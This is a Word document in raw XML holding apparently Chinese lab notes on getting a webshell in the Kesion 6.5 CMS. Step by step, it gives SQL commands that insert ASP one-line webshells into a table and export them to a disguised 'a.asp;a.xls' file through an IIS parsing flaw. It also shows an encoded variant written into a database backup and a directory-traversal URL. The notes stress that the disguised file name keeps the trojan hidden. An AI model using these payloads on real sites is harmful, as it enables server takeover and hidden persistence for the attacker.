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411A" w:rsidP="00AB411A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB411A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库执行拿</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB411A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB411A" w:rsidRDefault="00AB411A" w:rsidP="00AB411A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kesion6.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB411A" w:rsidRDefault="00AB411A" w:rsidP="00AB411A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浏览器对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> kesion6.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持性会好点，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问后台</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D5537" w:rsidRDefault="00E6058B" w:rsidP="001D5537">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库插马导出</w:t>
      </w:r>
      <w:r w:rsidR="001D5537">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿</w:t>
      </w:r>
      <w:r w:rsidR="001D5537">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB411A" w:rsidRDefault="00AB411A" w:rsidP="00AB41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59985" cy="225996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11A" w:rsidRDefault="00AB411A" w:rsidP="00AB41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2003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11A" w:rsidRDefault="00AB411A" w:rsidP="00AB411A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里可以执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，我们把一句话写到一张表里，再把它导出来，利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件名解析漏洞来命名，当然，在这之前需要信息收集到网站的绝对路径，这里网站绝对路径为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00470638" w:rsidRDefault="00AB411A" w:rsidP="001D5537">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB411A">
        <w:t>C:\Inetpub\wwwroot\Kesion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF5621" w:rsidRDefault="00FF5621" w:rsidP="001D5537">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果不知道网站的根目录绝对路径是什么，可以去备份数据库那里查看</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF5621" w:rsidRDefault="00FF5621" w:rsidP="001D55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0515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AC4" w:rsidRDefault="00557AC4" w:rsidP="001D5537"/>
    <w:p w:rsidR="00470638" w:rsidRPr="00557AC4" w:rsidRDefault="00470638" w:rsidP="00AB411A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="00557AC4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00557AC4" w:rsidRPr="00223DED">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>create table cmd (a varchar(50))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00470638" w:rsidRDefault="00470638" w:rsidP="00AB41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0175" cy="2096135"/>
            <wp:effectExtent l="19050" t="19050" r="2857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96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C09" w:rsidRDefault="00100C09" w:rsidP="00AB411A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00470638" w:rsidRPr="00D45948" w:rsidRDefault="00470638" w:rsidP="00AB411A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入一句话</w:t>
      </w:r>
      <w:r w:rsidR="00D45948" w:rsidRPr="00223DED">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>insert into cmd (a) values ('&lt;%execute request("a")%&gt;')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00470638" w:rsidRDefault="00470638" w:rsidP="00AB41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56480" cy="1984375"/>
            <wp:effectExtent l="19050" t="19050" r="2032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1984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C09" w:rsidRDefault="00100C09" w:rsidP="00AB411A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00470638" w:rsidRPr="00C733CC" w:rsidRDefault="00470638" w:rsidP="00AB411A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出数据库</w:t>
      </w:r>
      <w:r w:rsidR="00312914" w:rsidRPr="00223DED">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>select * into [a] in 'C:\Inetpub\wwwroot\Kesion\</w:t>
      </w:r>
      <w:r w:rsidR="00312914" w:rsidRPr="00F75639">
        <w:rPr>
          <w:b/>
          <w:color w:val="548DD4" w:themeColor="text2" w:themeTint="99"/>
        </w:rPr>
        <w:t>a.asp;a.xls</w:t>
      </w:r>
      <w:r w:rsidR="00312914" w:rsidRPr="00223DED">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>' 'excel 8.0;' from cmd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F75639" w:rsidRDefault="00223DED" w:rsidP="00AB41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62123"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="23777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21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26" w:rsidRDefault="001B1826" w:rsidP="00AB41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83323" cy="1837427"/>
            <wp:effectExtent l="19050" t="19050" r="17277" b="10423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30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23" cy="18374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26" w:rsidRDefault="00223DED" w:rsidP="00AB411A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里导出会有点慢，有时</w:t>
      </w:r>
      <w:r w:rsidR="001B1826">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidR="001B1826">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会死掉，需要重启一下才行，不过当管理员重启完服务器后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话木马已经写入到网站目录下面了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223DED" w:rsidRPr="00223DED" w:rsidRDefault="00223DED" w:rsidP="00AB411A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00223DED">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>http://192.168.10.12/a.asp;a.xls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223DED" w:rsidRDefault="00223DED" w:rsidP="00D854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46845"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="24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8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DED" w:rsidRDefault="00223DED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27227"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="25523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2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DED" w:rsidRDefault="00223DED">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GETSHELL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00223DED" w:rsidRDefault="00F75639" w:rsidP="00AB411A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>忘了说一点，记得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> drop table cmd</w:t>
      </w:r>
      <w:r w:rsidR="00BA7695">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，另外就是</w:t>
      </w:r>
      <w:r w:rsidR="00BA7695" w:rsidRPr="00F75639">
        <w:rPr>
          <w:b/>
          <w:color w:val="548DD4" w:themeColor="text2" w:themeTint="99"/>
        </w:rPr>
        <w:t>a.asp;a.xls</w:t>
      </w:r>
      <w:r w:rsidR="00BA7695" w:rsidRPr="00BA7695">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式的木马隐蔽性还可以</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA7695" w:rsidRDefault="00BA7695" w:rsidP="00AB41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4569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639" w:rsidRDefault="000C790E" w:rsidP="000C790E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:r w:rsidR="00422AFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>马</w:t>
      </w:r>
      <w:r w:rsidR="00422AFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F1BCD" w:rsidRPr="007F1BCD" w:rsidRDefault="007F1BCD" w:rsidP="007F1BCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>思路：数据库插马，然后</w:t>
      </w:r>
      <w:r w:rsidR="00422AFA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r>
        <w:t>选</w:t>
      </w:r>
      <w:r>
        <w:t>KS_Collect.Mdb</w:t>
      </w:r>
      <w:r>
        <w:t>数据库，因为数据量小些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF503C" w:rsidRPr="00AF503C" w:rsidRDefault="00AF503C" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>create table C:\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Inetpub\</w:t>
      </w:r>
      <w:r>
        <w:t>wwwroot\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kesion\</w:t>
      </w:r>
      <w:r>
        <w:t>KS_Data\Collect\KS_Collect.Mdb.cmd  (a varchar(50))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF503C" w:rsidRDefault="00AF503C" w:rsidP="00AF50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55671"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="15979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6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03C" w:rsidRDefault="00AF503C" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF503C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>insert into C:\Inetpub\wwwroot\Kesion\KS_Data\Collect\KS_Collect.Mdb.cmd  (a) values ('</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF503C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼攠數畣整爠煥敵瑳∨∣┩愾</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF503C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此处一点要弄编码，不要有杂的符号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF503C" w:rsidRDefault="00935DAD" w:rsidP="00AF50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98687"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="20563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6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DAD" w:rsidRDefault="00935DAD" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00935DAD">
        <w:t>insert into C:\Inetpub\wwwroot\Kesion\KS_Data\Collect\KS_Collect.Mdb.cmd  (a) values ('&lt;%eval request("x")%&gt;')</w:t>
      </w:r>
      <w:r w:rsidR="00783C30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidR="00783C30">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插入一句话木马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00783C30" w:rsidRDefault="00783C30" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00783C30" w:rsidRDefault="00783C30" w:rsidP="00AF50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576115"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="240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6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BCD" w:rsidRDefault="007F1BCD" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后将我们的</w:t>
      </w:r>
      <w:r w:rsidRPr="007F1BCD">
        <w:t>KS_Collect.Mdb.cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库备份成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r>
        <w:t>有时候不成功的话，插马的语句选择是关键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F1BCD" w:rsidRDefault="00FF5621" w:rsidP="00AF50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50393"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="11907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3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8D5" w:rsidRDefault="007918D5" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后访问对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看是否备份成功</w:t>
      </w:r>
      <w:r w:rsidRPr="007918D5">
        <w:rPr>
          <w:b/>
          <w:color w:val="548DD4" w:themeColor="text2" w:themeTint="99"/>
        </w:rPr>
        <w:t>http://192.168.10.12/KS_Data/Collect/demon.asp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C2425A" w:rsidRDefault="00C2425A" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C2425A" w:rsidRDefault="00C2425A" w:rsidP="00AF50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31993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AD" w:rsidRDefault="001075AD" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里需要多尝试不同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一句话马，直到成功为止。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C84278" w:rsidRDefault="00C84278" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C84278" w:rsidRDefault="00C84278" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C84278" w:rsidRDefault="00C84278" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>另外科迅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有目录遍历漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C84278" w:rsidRDefault="00C84278" w:rsidP="00AF503C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C84278">
        <w:t>http://192.168.10.12/admin/KS.adminfiles.asp?uploadDir=../../../..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C84278" w:rsidRPr="00AF503C" w:rsidRDefault="00C84278" w:rsidP="00AF503C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="373140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4278" w:rsidRPr="00AF5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CE9" w:rsidRDefault="00056CE9" w:rsidP="00AB411A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00056CE9" w:rsidRDefault="00056CE9" w:rsidP="00AB4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CE9" w:rsidRDefault="00056CE9" w:rsidP="00AB411A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00056CE9" w:rsidRDefault="00056CE9" w:rsidP="00AB41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11A"/>
    <w:rsid w:val="00056CE9"/>
    <w:rsid w:val="000C790E"/>
    <w:rsid w:val="00100C09"/>
    <w:rsid w:val="001075AD"/>
    <w:rsid w:val="001B1826"/>
    <w:rsid w:val="001D5537"/>
    <w:rsid w:val="00223DED"/>
    <w:rsid w:val="00312914"/>
    <w:rsid w:val="003457E6"/>
    <w:rsid w:val="00422AFA"/>
    <w:rsid w:val="00470638"/>
    <w:rsid w:val="00557AC4"/>
    <w:rsid w:val="00741EEF"/>
    <w:rsid w:val="00783C30"/>
    <w:rsid w:val="007918D5"/>
    <w:rsid w:val="007C4CCF"/>
    <w:rsid w:val="007F1BCD"/>
    <w:rsid w:val="008877BC"/>
    <w:rsid w:val="00935DAD"/>
    <w:rsid w:val="00AB411A"/>
    <w:rsid w:val="00AF503C"/>
    <w:rsid w:val="00BA7695"/>
    <w:rsid w:val="00C2425A"/>
    <w:rsid w:val="00C733CC"/>
    <w:rsid w:val="00C84278"/>
    <w:rsid w:val="00CC4F39"/>
    <w:rsid w:val="00D0457C"/>
    <w:rsid w:val="00D45948"/>
    <w:rsid w:val="00D8541C"/>
    <w:rsid w:val="00E6058B"/>
    <w:rsid w:val="00F75639"/>
    <w:rsid w:val="00FF5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1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4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41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4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41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411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B41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41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55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31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-12T04:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-12T06:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>